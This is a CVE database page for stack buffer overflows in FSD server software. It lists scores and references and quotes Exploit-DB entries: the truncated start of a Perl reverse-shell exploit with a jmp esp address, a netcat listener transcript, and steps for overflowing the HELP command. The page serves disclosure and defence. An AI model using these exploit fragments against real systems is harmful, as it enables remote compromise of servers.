CVE-2007-5256
published 2007-10-06CVE-2007-5256: Multiple stack-based buffer overflows in FSD 2.052 d9 and earlier, and FSFDT FSD 3.000 d9 and earlier, allow (1) remote attackers to execute arbitrary code via…
PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
7.07%
93.4th percentile
Multiple stack-based buffer overflows in FSD 2.052 d9 and earlier, and FSFDT FSD 3.000 d9 and earlier, allow (1) remote attackers to execute arbitrary code via a long HELP command on TCP port 3010 to the sysuser::exechelp function in sysuser.cc and (2) remote authenticated users to execute arbitrary code via long commands on TCP port 6809 to the servinterface::sendmulticast function in servinterface.cc, as demonstrated by a PIcallsign command.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mcdu | fsd | — | — |
| mcdu | fsd | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
exploitdb·2007-10-04
CVE-2007-5256 FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow
---
# ~$ nc -l -p 4321
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# E:\draft\fsd1110\windows>_
#
# -------------------------------------------
#!/usr/bin/perl
# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to 10.0.0.100:4321
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4
use IO::Socket;
if( $#ARGV ";
exit();
}
my $ip = $ARGV[0];
my $port = $ARGV[1];
print "connecting...\n";
my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', );
die "could not create socket: $!\n" unless $sock;
# jmp esp in KERNEL32.DLL 5.0.2195.7006
my $jmpesp = "\xB7\x49\xE7\x77";
# encoded 'jmp 0x400' to jump to stage2
my $jmpcode =
"
Exploit-DB
FSD 2.052/3.000 - 'sysuser.cc sysuser::exechelp' 'HELP' Remote Overflow
exploitdb·2007-10-01
CVE-2007-5256 FSD 2.052/3.000 - 'sysuser.cc sysuser::exechelp' 'HELP' Remote Overflow
FSD 2.052/3.000 - 'sysuser.cc sysuser::exechelp' 'HELP' Remote Overflow
---
source: https://www.securityfocus.com/bid/25883/info
FSD is prone to multiple remote buffer-overflow vulnerabilities because the application fails to perform adequate boundary-checks on user-supplied data.
An attacker can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
These issues affect FSD 2.052 d9 and 3.0000 d9; other versions may also be affected.
#!/usr/bin/perl
# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to 10.0.0.100:4321
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4
use IO::Socket;
if( $#ARGV ";
exit();
}
my $ip = $ARGV[0];
my
Exploit-DB
FSD 2.052/3.000 - 'servinterface.cc servinterface::sendmulticast' 'PIcallsign' Command Remote Overflow
exploitdb·2007-10-01
CVE-2007-5256 FSD 2.052/3.000 - 'servinterface.cc servinterface::sendmulticast' 'PIcallsign' Command Remote Overflow
FSD 2.052/3.000 - 'servinterface.cc servinterface::sendmulticast' 'PIcallsign' Command Remote Overflow
---
source: https://www.securityfocus.com/bid/25883/info
FSD is prone to multiple remote buffer-overflow vulnerabilities because the application fails to perform adequate boundary-checks on user-supplied data.
An attacker can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
These issues affect FSD 2.052 d9 and 3.0000 d9; other versions may also be affected.
A]
connect with nc or telnet to port 3010 (sometimes it can be 3011, but
it's easy to recognize since it shows a "FSD>" prompt) and then send:
HELP aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...(more_than_100_'a's)...aaaa
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/fsdbof-adv.txthttp://secunia.com/advisories/27008http://secunia.com/advisories/27045http://securityreason.com/securityalert/3195http://www.securityfocus.com/archive/1/481221/100/0/threadedhttp://www.securityfocus.com/archive/1/481495/100/0/threadedhttp://www.securityfocus.com/bid/25883http://www.vupen.com/english/advisories/2007/3334https://www.exploit-db.com/exploits/4484http://aluigi.altervista.org/adv/fsdbof-adv.txthttp://secunia.com/advisories/27008http://secunia.com/advisories/27045http://securityreason.com/securityalert/3195http://www.securityfocus.com/archive/1/481221/100/0/threadedhttp://www.securityfocus.com/archive/1/481495/100/0/threadedhttp://www.securityfocus.com/bid/25883http://www.vupen.com/english/advisories/2007/3334https://www.exploit-db.com/exploits/4484
2007-10-06
Published